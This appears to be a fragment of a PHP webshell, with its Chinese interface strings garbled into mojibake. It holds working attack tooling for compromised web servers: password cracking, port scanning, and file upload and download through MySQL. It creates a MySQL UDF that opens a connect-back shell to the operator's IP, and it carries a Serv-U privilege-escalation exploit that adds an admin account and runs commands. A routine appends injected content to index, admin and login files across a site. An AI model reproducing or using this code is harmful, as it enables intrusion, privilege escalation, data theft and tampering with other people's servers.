ʺ'.$tb->makeinput('user','root','','text','12').''.$tb->makehidden('do','crack').' ֵ:'.$tb->makeinput('passfile','./password.txt','','text','20').' һ̽:'.$tb->makeinput('onetime','100','','text','6').' '.$tb->makeinput('','crack','','submit'),'center','1','35'); $tb->tdbody('MYSQL:   Ftp:','center'); echo ""; if(getphpcfg("allow_url_fopen")=="Yes") $temp = "Զļ"; $tb->tdbody('ֵʹԻ·'.$temp.'FtpƽѾͨ','center'); $tb->formheader($action,'˿ɨ'); $tb->tdbody('Խж˿ڵļɨ衣','center'); $tb->tdbody('host: '.$tb->makeinput('host','127.0.0.1',''.$tb->makehidden('do','port').'','text','12').' ˿ڱ:'.$tb->makeinput('port',''.$admin[port].'','','text','60').'','center','1','35'); $tb->tdbody(''.$tb->makeinput('','ж˿ɨ','','submit').'','center'); echo ""; $tb->tdbody('˿ڱҪĶ˿öŸ!','center'); $tb->tableheader(); }else{ $tb->formheader("".$action."\" enctype=\"multipart/form-data",'ʹMysqlϴļ [Crack]'); $tb->tdbody('MysqlʺŰļmysqlȨ޵WebshellȨޱдĵط','center'); $tb->tdbody('Host: '.$tb->makeinput('host','localhost','','text','16').'User: '.$tb->makeinput('user','root','','text','16').'PASS: '.$tb->makeinput('password','','','text','16').'db: '.$tb->makeinput('database','mysql.user','','text','16').'upto: '.$tb->makeinput('uppath','c:/','','text','16').''.$tb->makehidden('action','mysqlup'),'center','1','35'); $tb->tdbody('ϴļ: '.$tb->makeinput('upname','','','text','16').'ѡļ: '.$tb->makeinput('upfile','','','file','26').''.$tb->makeinput('','upload','','submit'),'center','1','35'); echo ""; $tb->tdbody('òֻҪfileȨ޵ʺžͿ,дϴļΪԭļ.','center'); $tb->formheader($action,'Mysqlļ'); $tb->tdbody('MysqlʺWebshellܶȡصļݿļ ѹ ','center'); $tb->tdbody('Host: '.$tb->makeinput('host','localhost','','text','16').'User: '.$tb->makeinput('user','root','','text','16').'PASS: '.$tb->makeinput('password','','','text','16').''.$tb->makehidden('action','mysqldown').'ļ: '.$tb->makeinput('filename','C:/windows/php.ini','','text','26').''.$tb->makeinput('','download','','submit'),'center','1','35'); echo ""; $tb->tdbody('òֻҪfileȨ޵ʺžͿ,ٿԶھ.','center'); $tb->tdbody('WindowsĬMysqlΪSystemȨޣLinuxϵͳȨ޲ߡ.','center'); } $tb->tablefooter(); } elseif ($_GET['action'] == "search"){ $action = '?dir='.$dir.''; $tb->tableheader(); $tb->formheader($action,'ļ'); $tb->tdbody('ʹñܲһĿ¼µļдļŹؼ!','center'); $tb->tdbody('ļλ: '.$tb->makeinput('path',''.$nowpath.'','','text','70').'
:'.$tb->makeinput('oldkey','¼','','text','60').''.$tb->makehidden('do','search').'
Ƿ (˹ܺһܻӰִٶȣĬϹر!)
ʵȡ: ȡؼǰ'.$tb->makeinput('beline','0','','text','3').'ַ '.$tb->makehidden('dir',''.$dir.'').'ؼʺ'.$tb->makeinput('endline','10','','text','3').'ַ... '.$tb->makehidden('dir',''.$dir.'').''.$tb->makeinput('','ʼļ','','submit'),'center','1','35'); echo ""; $tb->tdbody('̫Ŀ¼ˣҺò.ѡٶȻʾ[/ܹ]','center'); $tb->tablefooter(); } elseif ($_GET['action'] == "proxy") { $action = '?action=proxy'; $tb->tableheader(); $tb->formheader($action,'ߴ','proxyframe'); $tb->tdbody('
','left'); $tb->tdbody('URL: '.$tb->makeinput('url','about:blank','','text','100').' '.$tb->makeinput('','','','submit'),'center','1','40'); $tb->tdbody(''); echo ""; $tb->tablefooter(); }//end proxy elseif ($_GET['action'] == "sql") { $action = '?action=sql'; $servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost'; $dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root'; $dbpassword = $_POST['dbpassword']; $dbname = $_POST['dbname']; $sql_query = $_POST['sql_query']; if($type=="fun"){ $sql_query = "CREATE FUNCTION Mixconnect RETURNS STRING SONAME 'C:\\\Winnt\\\Mix.dll'; select Mixconnect('".$_SERVER['REMOTE_ADDR']."','8888');/*ִһ*/ /*ִ nc -vv -l -p 8888*/"; } $tb->tableheader(); $tb->formheader($action,'ִ SQL '); $tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','','','submit')); $tb->tdbody($tb->maketextarea('sql_query',$sql_query,'85','10')); $tb->makehidden('do','query'); $tb->formfooter('1','30'); }//end sql query elseif ($_GET['action'] == "sqlbak") { $action = '?action=sqlbak'; $servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost'; $dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root'; $dbpassword = $_POST['dbpassword']; $dbname = $_POST['dbname']; $tb->tableheader(); $tb->formheader($action,' MySQL ݿ'); $tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','','','submit')); @mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname); $tables = @mysql_list_tables($dbname); while ($table = @mysql_fetch_row($tables)) { $cachetables[$table[0]] = $table[0]; } @mysql_free_result($tables); if (empty($cachetables)) { $tb->tdbody('ûݿ or ǰݿûκݱ'); } else { $tb->tdbody('
ѡ:'.$tb->makeselect(array('name'=>'table[]','option'=>$cachetables,'multiple'=>1,'size'=>15,'css'=>1)).'
·:'.$tb->makeinput('path',$pathname.'/'.$_SERVER['HTTP_HOST'].'_MySQL.sql','','text','50').'
ֱص (ʺСݿ)
'); $tb->makehidden('do','backupmysql'); $tb->formfooter('0','30'); } $tb->tablefooter(); @mysql_close(); }//end sql backup elseif ($_GET['action'] == "phpenv") { $user = " crush˻ȡǰû "; $upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "ϴ"; $adminmail=(isset($_SERVER['SERVER_ADMIN'])) ? "".$_SERVER['SERVER_ADMIN']."" : "".get_cfg_var("sendmail_from").""; if ($dis_func == "") { $dis_func = "No"; }else { $dis_func = str_replace(" ","
",$dis_func); $dis_func = str_replace(",","
",$dis_func); } $phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No"; $info = array( 0 => array("ǰphpû",$user), 1 => array("ϵͳ",PHP_OS), 2 => array("ʱ",date("Ymd h:i:s",time())), 3 => array("","".$_SERVER['SERVER_NAME'].""), 4 => array("IPַ",gethostbyname($_SERVER['SERVER_NAME'])), 5 => array("ϵͳֱ",$_SERVER['HTTP_ACCEPT_LANGUAGE']), 6 => array("",$_SERVER['SERVER_SOFTWARE']), 7 => array("Web˿",$_SERVER['SERVER_PORT']), 8 => array("PHPзʽ",strtoupper(php_sapi_name())), 9 => array("PHP汾",PHP_VERSION), 10 => array("ڰȫģʽ",getphpcfg("safemode")), 11 => array("Ա",$adminmail), 12 => array("ļ·",__FILE__), 13 => array("ʹ URL ļ allow_url_fopen",getphpcfg("allow_url_fopen")), 14 => array("̬ӿ enable_dl",getphpcfg("enable_dl")), 15 => array("ʾϢ display_errors",getphpcfg("display_errors")), 16 => array("Զȫֱ register_globals",getphpcfg("register_globals")), 17 => array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")), 18 => array("ʹڴ memory_limit",getphpcfg("memory_limit")), 19 => array("POSTֽ post_max_size",getphpcfg("post_max_size")), 20 => array("ϴļ upload_max_filesize",$upsize), 21 => array("ʱ max_execution_time",getphpcfg("max_execution_time").""), 22 => array("õĺ disable_functions",$dis_func), 23 => array("phpinfo()",$phpinfo), 24 => array("Ŀǰпռdiskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'), 25 => array("ͼδ GD Library",getfun("imageline")), 26 => array("IMAPʼϵͳ",getfun("imap_close")), 27 => array("MySQLݿ",getfun("mysql_close")), 28 => array("SyBaseݿ",getfun("sybase_close")), 29 => array("Oracleݿ",getfun("ora_close")), 30 => array("Oracle 8 ݿ",getfun("OCILogOff")), 31 => array("PREL﷨ PCRE",getfun("preg_match")), 32 => array("PDFĵ֧",getfun("pdf_close")), 33 => array("Postgre SQLݿ",getfun("pg_close")), 34 => array("SNMPЭ",getfun("snmpget")), 35 => array("ѹļ֧(Zlib)",getfun("gzclose")), 36 => array("XML",getfun("xml_set_object")), 37 => array("FTP",getfun("ftp_login")), 38 => array("ODBCݿ",getfun("odbc_close")), 39 => array("Session֧",getfun("session_start")), 40 => array("Socket֧",getfun("fsockopen")), ); $tb->tableheader(); echo "
\n"; $tb->tdbody('鿴PHPò״','left','1','30','style="padding-left: 5px;"'); $tb->tdbody('ò(:magic_quotes_gpc): '.$tb->makeinput('phpvarname','','','text','40').' '.$tb->makeinput('','鿴','','submit'),'left','2','30','style="padding-left: 5px;"'); $tb->makehidden('do','viewphpvar'); echo "
\n"; $hp = array(0=> '', 1=> 'PHP', 2=> '֧״'); for ($a=0;$a<3;$a++) { $tb->tdbody(''.$hp[1].'','left','1','30','style="padding-left: 5px;"'); ?> \n"; } } elseif ($a == 1) { for ($i=13;$i<=24;$i++) { echo "\n"; } } elseif ($a == 2) { for ($i=25;$i<=40;$i++) { echo "\n"; } } ?>
".$info[$i][0]."".$info[$i][1]."
".$info[$i][0]."".$info[$i][1]."
".$info[$i][0]."".$info[$i][1]."
"; }//end phpenv elseif($_GET['action'] == "mysqlfun"){ echo "
"; if($_POST['port'] != "" && $_POST['ip'] != "" && $_POST['function'] != "" && $_POST['host'] != "" && $_POST['user'] != "") { $link=@mysql_connect($_POST['host'],$_POST['user'],$_POST['pass']); if (!$link) { echo "Could not connect: ".mysql_error()."
"; } else{ echo "Connected successfully as ".$_POST['user']."
"; if(isset($_POST['mixpath'])&&!@file_exists($_POST['mixpath'])){ echo"Can't find the ".$_POST['mixpath']."
"; } if(isset($_POST['mixpath'])){ $dll_path = addslashes($_POST['mixpath']); $query="create function ".$_POST['function']." returns integer soname '".$dll_path."';"; echo (@mysql_query($query, $link)) ? "Success: ".$query."
" : "Create function faild!
".mysql_error()."
"; } echo"Now Select Function name of ".$_POST['function']."
"; $query="select ".$_POST['function']."('".$_POST['ip']."','".$_POST['port']."');"; echo (@mysql_query($query, $link)) ? "Success: ".$query."
" : "Select Function name of ".$_POST['function']." faild!
".mysql_error()."
"; mysql_close($link); } }else{ echo""; } echo "
"; if($nodll=="yes"){ $echodll = " (?)  Mixdll:  (function)"; }else{ $echodll = "˲ѽfunctionй  (δfunction)"; } ?>
mysql_functionȨmix.dll
(Func) ض˿: IP: function:  (Mix.dll)
Host : User : PassWd :
";?>
Remember,Love is a dieing dream....
"; $sendbuf = ""; $recvbuf = ""; $domain = "-SETDOMAIN\r\n". "-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n". "-TZOEnable=0\r\n". " TZOKey=\r\n"; $adduser = "-SETUSERSETUP\r\n". "-IP=0.0.0.0\r\n". "-PortNo=21\r\n". "-User=".$user."\r\n". "-Password=".$password."\r\n". "-HomeDir=c:\\\r\n". "-LoginMesFile=\r\n". "-Disable=0\r\n". "-RelPaths=1\r\n". "-NeedSecure=0\r\n". "-HideHidden=0\r\n". "-AlwaysAllowLogin=0\r\n". "-ChangePassword=0\r\n". "-QuotaEnable=0\r\n". "-MaxUsersLoginPerIP=-1\r\n". "-SpeedLimitUp=0\r\n". "-SpeedLimitDown=0\r\n". "-MaxNrUsers=-1\r\n". "-IdleTimeOut=600\r\n". "-SessionTimeOut=-1\r\n". "-Expire=0\r\n". "-RatioUp=1\r\n". "-RatioDown=1\r\n". "-RatiosCredit=0\r\n". "-QuotaCurrent=0\r\n". "-QuotaMaximum=0\r\n". "-Maintenance=None\r\n". "-PasswordType=Regular\r\n". "-Ratios=None\r\n". " Access=".$part."\|RWAMELCDP\r\n"; $deldomain="-DELETEDOMAIN\r\n". "-IP=0.0.0.0\r\n". " PortNo=21\r\n"; $sock = fsockopen("127.0.0.1", $_POST["SUPort"], &$errno, &$errstr, 10); $recvbuf = fgets($sock, 1024); echo "Recv: $recvbuf
"; $sendbuf = "USER ".$_POST["SUUser"]."\r\n"; fputs($sock, $sendbuf, strlen($sendbuf)); echo "Send: $sendbuf
"; $recvbuf = fgets($sock, 1024); echo "Recv: $recvbuf
"; $sendbuf = "PASS ".$_POST["SUPass"]."\r\n"; fputs($sock, $sendbuf, strlen($sendbuf)); echo "Send: $sendbuf
"; $recvbuf = fgets($sock, 1024); echo "Recv: $recvbuf
"; $sendbuf = "SITE MAINTENANCE\r\n"; fputs($sock, $sendbuf, strlen($sendbuf)); echo "Send: $sendbuf
"; $recvbuf = fgets($sock, 1024); echo "Recv: $recvbuf
"; $sendbuf = $domain; fputs($sock, $sendbuf, strlen($sendbuf)); echo "Send: $sendbuf
"; $recvbuf = fgets($sock, 1024); echo "Recv: $recvbuf
"; $sendbuf = $adduser; fputs($sock, $sendbuf, strlen($sendbuf)); echo "Send: $sendbuf
"; $recvbuf = fgets($sock, 1024); echo "Recv: $recvbuf
"; echo "**********************************************************
"; if($job!=="adduser"){//費ǽû echo "Starting Exploit ...
"; echo "**********************************************************
"; $exp = fsockopen("127.0.0.1", "21", &$errno, &$errstr, 10); $recvbuf = fgets($exp, 1024); echo "Recv: $recvbuf
"; $sendbuf = "USER ".$user."\r\n"; fputs($exp, $sendbuf, strlen($sendbuf)); echo "Send: $sendbuf
"; $recvbuf = fgets($exp, 1024); echo "Recv: $recvbuf
"; $sendbuf = "PASS ".$password."\r\n"; fputs($exp, $sendbuf, strlen($sendbuf)); echo "Send: $sendbuf
"; $recvbuf = fgets($exp, 1024); echo "Recv: $recvbuf
"; $sendbuf = "site exec ".$_POST["SUCommand"]."\r\n"; fputs($exp, $sendbuf, strlen($sendbuf)); echo "Send: site exec ".$_POST["SUCommand"]."
"; $recvbuf = fgets($exp, 1024); echo "Recv: $recvbuf
"; echo "**********************************************************
"; echo "Starting Delete Domain ...
"; echo "**********************************************************
"; $sendbuf = $deldomain; fputs($sock, $sendbuf, strlen($sendbuf)); echo "Send: $sendbuf
"; $recvbuf = fgets($sock, 1024); echo "Recv: $recvbuf
"; }else{ echo "All done ...
"; echo "**********************************************************
"; } echo ""; fclose($sock); if($job!=="adduser") fclose($exp); } ?>
ͨServ-U عԱʺִ &
LocalPort: LocalUser: LocalPass:
Command:  (û) - (?) ʺ: : Ŀ¼: (ִCMD) - (?)
:ʹñ·ǷΪԸ
:
read()) { if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) { @chmod("$deldir/$file",0777); deltree("$deldir/$file"); } if (is_file("$deldir/$file")) { @chmod("$deldir/$file",0777); @unlink("$deldir/$file"); } } $mydir->close(); @chmod("$deldir",0777); return (@rmdir($deldir)) ? 1 : 0; } // ж϶д function dir_writeable($dir) { if (!is_dir($dir)) { @mkdir($dir, 0777); } if(is_dir($dir)) { if ($fp = @fopen("$dir/test.txt", 'w')) { @fclose($fp); @unlink("$dir/test.txt"); $writeable = 1; } else { $writeable = 0; } } return $writeable; } // мıɫ滻 function getrowbg() { global $bgcounter; if ($bgcounter++%2==0) { return "firstalt"; } else { return "secondalt"; } } // ȡǰļϵͳ· function getPath($mainpath, $relativepath) { global $dir; $mainpath_info = explode('/', $mainpath); $relativepath_info = explode('/', $relativepath); $relativepath_info_count = count($relativepath_info); for ($i=0; $i<$relativepath_info_count; $i++) { if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue; if ($relativepath_info[$i] == '..') { $mainpath_info_count = count($mainpath_info); unset($mainpath_info[$mainpath_info_count-1]); continue; } $mainpath_info[count($mainpath_info)] = $relativepath_info[$i]; } //end for return implode('/', $mainpath_info); } function dirtree($path,$mm) { $d =@dir("$path"); while (false !== ($entry = $d->read())) { if($entry == "." || $entry == "..") continue; $file=$d->path."/" .$entry; if(@is_dir($file)) { dirtree($file,$mm); } else { if(@ereg("default\.|index\.|admin\.|bbs\.|reg\.|help\.|upfile\.|upload\.|cart\.|class\.|login\.|diy\.|no\.|ok\.|del\.|sql\.|user\.|ubb\.|ftp\.|asp\.|top\.|new\.|open\.|name\.|email\.|img\.|images\.|web\.|blog\.|save\.|data\.|add\.|edit\.|main\.|form\.|game\.|about\.|manager\.|book\.|bt\.|mp3\.|vod\.|error\.|copy\.|move\.|down\.|system\.|logo\.|QQ\.|520\.|newup\.|myup\.|play\.|show\.|view\.|ip\.|err404\.|send\.|foot\.|char\.|info\.|list\.|shop\.|err\.|nc\.|ad\.|flash\.|text\.|admin_upfile\.|admin_upload\.|upfile_load\.|upfile_soft\.|upfile_photo\.|upfile_softpic\.|vip\.|505\.|tag\.|search\.|list\.|common\.|show\.|count\.|download\.|php\.",$file)) { $mm=stripcslashes( trim( $mm ) );//ֹ˫űб $handle = @fopen ("$file", "a"); @fwrite($handle, "$mm"); @fclose($handle); echo "ѹļ:$file
"; } } } $d->close(); } // PHPò function getphpcfg($varname) { switch($result = get_cfg_var($varname)) { case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break; } } // 麯 function getfun($funName) { return (false !== function_exists($funName)) ? "Yes" : "No"; } class zip //ZIPѹ { var $datasec, $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; var $dirs = Array("."); function Add($files,$compact) { if(!is_array($files[0])) $files=Array($files); for($i=0;$files[$i];$i++){ $fn = $files[$i]; if(!in_Array(dirname($fn[0]),$this->dirs)) $this->add_Dir(dirname($fn[0])); if(basename($fn[0])) $ret[basename($fn[0])]=$this->add_File($fn[1],$fn[0],$compact); } return $ret; } function get_file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)). pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; } function ReadCentralDir($zip,$zip_name) { $size = filesize($zip_name); if ($size < 277) $maximum_size = $size; else $maximum_size=277; @fseek($zip, $size-$maximum_size); $pos = ftell($zip); $bytes = 0x00000000; while ($pos < $size) { $byte = @fread($zip, 1); $bytes=($bytes << 8) | Ord($byte); if ($bytes == 0x504b0506){ $pos++; break; } $pos++; } $data=unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',fread($zip,18)); if ($data['comment_size'] != 0) $centd['comment'] = fread($zip, $data['comment_size']); else $centd['comment'] = ''; $centd['entries'] = $data['entries']; $centd['disk_entries'] = $data['disk_entries']; $centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start']; $centd['size'] = $data['size']; $centd['disk'] = $data['disk']; return $centd; } function ReadCentralFileHeaders($zip){ $binary_data = fread($zip, 46); $header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data); if ($header['filename_len'] != 0) $header['filename'] = fread($zip,$header['filename_len']); else $header['filename'] = ''; if ($header['extra_len'] != 0) $header['extra'] = fread($zip, $header['extra_len']); else $header['extra'] = ''; if ($header['comment_len'] != 0) $header['comment'] = fread($zip, $header['comment_len']); else $header['comment'] = ''; if ($header['mdate'] && $header['mtime']) { $hour = ($header['mtime'] & 0xF800) >> 11; $minute = ($header['mtime'] & 0x07E0) >> 5; $seconde = ($header['mtime'] & 0x001F)*2; $year = (($header['mdate'] & 0xFE00) >> 9) + 1980; $month = ($header['mdate'] & 0x01E0) >> 5; $day = $header['mdate'] & 0x001F; $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); } else { $header['mtime'] = time(); } $header['stored_filename'] = $header['filename']; $header['status'] = 'ok'; if (substr($header['filename'], -1) == '/') $header['external'] = 0x41FF0010; return $header; } function add_dir($name) { $name = str_replace("\\", "/", $name); $fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; $fr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); $fr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0); $this -> datasec[] = $fr; $new_offset = strlen(implode("", $this->datasec)); $cdrec = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; $cdrec .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); $cdrec .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 ); $ext = "\xff\xff\xff\xff"; $cdrec .= pack("V", 16 ).pack("V", $this -> old_offset ).$name; $this -> ctrl_dir[] = $cdrec; $this -> old_offset = $new_offset; $this -> dirs[] = $name; } function get_List($zip_name) { $zip = @fopen($zip_name, 'rb'); if(!$zip) return(0); $centd = $this->ReadCentralDir($zip,$zip_name); @rewind($zip); @fseek($zip, $centd['offset']); for ($i=0; $i<$centd['entries']; $i++) { $header = $this->ReadCentralFileHeaders($zip); $header['index'] = $i;$info['filename'] = $header['filename']; $info['stored_filename'] = $header['stored_filename']; $info['size'] = $header['size'];$info['compressed_size']=$header['compressed_size']; $info['crc'] = strtoupper(dechex( $header['crc'] )); $info['mtime'] = $header['mtime']; $info['comment'] = $header['comment']; $info['folder'] = ($header['external']==0x41FF0010||$header['external']==16)?1:0; $info['index'] = $header['index'];$info['status'] = $header['status']; $ret[]=$info; unset($header); } return $ret; } function add_File($data, $name, $compact = 1) { $name = str_replace('\\', '/', $name); $dtime = dechex($this->DosTime()); $hexdtime = '\x' . $dtime[6] . $dtime[7].'\x'.$dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3].'\x'.$dtime[0].$dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); if($compact) $fr = "\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00".$hexdtime; else $fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00".$hexdtime; $unc_len = strlen($data); $crc = crc32($data); if($compact){ $zdata = gzcompress($data); $c_len = strlen($zdata); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); }else{ $zdata = $data; } $c_len=strlen($zdata); $fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); $fr .= pack('v', strlen($name)).pack('v', 0).$name.$zdata; $fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode('', $this->datasec)); if($compact) $cdrec = "\x50\x4b\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00"; else $cdrec = "\x50\x4b\x01\x02\x14\x00\x0a\x00\x00\x00\x00\x00"; $cdrec .= $hexdtime.pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ).pack('v', 0 ).pack('v', 0 ); $cdrec .= pack('v', 0 ).pack('v', 0 ).pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; return true; } function DosTime() { $timearray = getdate(); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function Extract ( $zn, $to, $index = Array(-1) ) { $ok = 0; $zip = @fopen($zn,'rb'); if(!$zip) return(-1); $cdir = $this->ReadCentralDir($zip,$zn); $pos_entry = $cdir['offset']; if(!is_array($index)){ $index = array($index); } for($i=0; $index[$i];$i++){ if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries']) return(-1); } for ($i=0; $i<$cdir['entries']; $i++) { @fseek($zip, $pos_entry); $header = $this->ReadCentralFileHeaders($zip); $header['index'] = $i; $pos_entry = ftell($zip); @rewind($zip); fseek($zip, $header['offset']); if(in_array("-1",$index)||in_array($i,$index)) $stat[$header['filename']]=$this->ExtractFile($header, $to, $zip); } fclose($zip); return $stat; } function ExtractFile($header,$to,$zip) { $header = $this->readfileheader($zip); if(substr($to,-1)!="/") $to.="/"; if(!@is_dir($to)) @mkdir($to,0777); $pth = explode("/",dirname($header['filename'])); for($i=0;isset($pth[$i]);$i++){ if(!$pth[$i]) continue;$pthss.=$pth[$i]."/"; if(!is_dir($to.$pthss)) @mkdir($to.$pthss,0777); } if (!($header['external']==0x41FF0010)&&!($header['external']==16)) { if ($header['compression']==0) { $fp = @fopen($to.$header['filename'], 'wb'); if(!$fp) return(-1); $size = $header['compressed_size']; while ($size != 0) { $read_size = ($size < 2048 ? $size : 2048); $buffer = fread($zip, $read_size); $binary_data = pack('a'.$read_size, $buffer); @fwrite($fp, $binary_data, $read_size); $size -= $read_size; } fclose($fp); touch($to.$header['filename'], $header['mtime']); }else{ $fp = @fopen($to.$header['filename'].'.gz','wb'); if(!$fp) return(-1); $binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']), Chr(0x00), time(), Chr(0x00), Chr(3)); fwrite($fp, $binary_data, 10); $size = $header['compressed_size']; while ($size != 0) { $read_size = ($size < 1024 ? $size : 1024); $buffer = fread($zip, $read_size); $binary_data = pack('a'.$read_size, $buffer); @fwrite($fp, $binary_data, $read_size); $size -= $read_size; } $binary_data = pack('VV', $header['crc'], $header['size']); fwrite($fp, $binary_data,8); fclose($fp); $gzp = @gzopen($to.$header['filename'].'.gz','rb') or die("Cette archive est compresse"); if(!$gzp) return(-2); $fp = @fopen($to.$header['filename'],'wb'); if(!$fp) return(-1); $size = $header['size']; while ($size != 0) { $read_size = ($size < 2048 ? $size : 2048); $buffer = gzread($gzp, $read_size); $binary_data = pack('a'.$read_size, $buffer); @fwrite($fp, $binary_data, $read_size); $size -= $read_size; } fclose($fp); gzclose($gzp); touch($to.$header['filename'], $header['mtime']); @unlink($to.$header['filename'].'.gz'); }} return true; } function ReadFileHeader($zip) { $binary_data = fread($zip, 30); $data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data); $header['filename'] = fread($zip, $data['filename_len']); if ($data['extra_len'] != 0) { $header['extra'] = fread($zip, $data['extra_len']); } else { $header['extra'] = ''; } $header['compression'] = $data['compression'];$header['size'] = $data['size']; $header['compressed_size'] = $data['compressed_size']; $header['crc'] = $data['crc']; $header['flag'] = $data['flag']; $header['mdate'] = $data['mdate'];$header['mtime'] = $data['mtime']; if ($header['mdate'] && $header['mtime']){ $hour=($header['mtime']&0xF800)>>11;$minute=($header['mtime']&0x07E0)>>5; $seconde=($header['mtime']&0x001F)*2;$year=(($header['mdate']&0xFE00)>>9)+1980; $month=($header['mdate']&0x01E0)>>5;$day=$header['mdate']&0x001F; $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); }else{$header['mtime'] = time();} $header['stored_filename'] = $header['filename']; $header['status'] = "ok"; return $header; } } function addziparray($dir2) //ZIPļ { global $dir,$zipfilearray; @$dirs=opendir($dir."/".$dir2); while (@$file=readdir($dirs)) { if(!is_dir("$dir/$dir2/$file")) { $zipfilearray[]="$dir2/$file"; } elseif($file!="."&&$file!="..") { addziparray("$dir2/$file"); } } @closedir($dirs); } function hlinK($str=""){ $myvars=array('workingdiR','urL','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL'); $ret=$_SERVER['PHP_SELF']."?"; $new=explode("&",$str); foreach ($_GET as $key => $v){ $add=1; foreach($new as $m){ $el = explode("=", $m); if ($el[0]==$key)$add=0; } if($add)if(!in_array($key,$myvars))$ret.=$key."=".$v."&"; } $ret.=$str; return $ret; } // ݿ function sqldumptable($table, $fp=0) { $tabledump = "DROP TABLE IF EXISTS $table;\n"; $tabledump .= "CREATE TABLE $table (\n"; $firstfield=1; $fields = mysql_query("SHOW FIELDS FROM $table"); while ($field = mysql_fetch_array($fields)) { if (!$firstfield) { $tabledump .= ",\n"; } else { $firstfield=0; } $tabledump .= " $field[Field] $field[Type]"; if (!empty($field["Default"])) { $tabledump .= " DEFAULT '$field[Default]'"; } if ($field['Null'] != "YES") { $tabledump .= " NOT NULL"; } if ($field['Extra'] != "") { $tabledump .= " $field[Extra]"; } } mysql_free_result($fields); $keys = mysql_query("SHOW KEYS FROM $table"); while ($key = mysql_fetch_array($keys)) { $kname=$key['Key_name']; if ($kname != "PRIMARY" and $key['Non_unique'] == 0) { $kname="UNIQUE|$kname"; } if(!is_array($index[$kname])) { $index[$kname] = array(); } $index[$kname][] = $key['Column_name']; } mysql_free_result($keys); while(list($kname, $columns) = @each($index)) { $tabledump .= ",\n"; $colnames=implode($columns,","); if ($kname == "PRIMARY") { $tabledump .= " PRIMARY KEY ($colnames)"; } else { if (substr($kname,0,6) == "UNIQUE") { $kname=substr($kname,7); } $tabledump .= " KEY $kname ($colnames)"; } } $tabledump .= "\n);\n\n"; if ($fp) { fwrite($fp,$tabledump); } else { echo $tabledump; } $rows = mysql_query("SELECT * FROM $table"); $numfields = mysql_num_fields($rows); while ($row = mysql_fetch_array($rows)) { $tabledump = "INSERT INTO $table VALUES("; $fieldcounter=-1; $firstfield=1; while (++$fieldcounter<$numfields) { if (!$firstfield) { $tabledump.=", "; } else { $firstfield=0; } if (!isset($row[$fieldcounter])) { $tabledump .= "NULL"; } else { $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'"; } } $tabledump .= ");\n"; if ($fp) { fwrite($fp,$tabledump); } else { echo $tabledump; 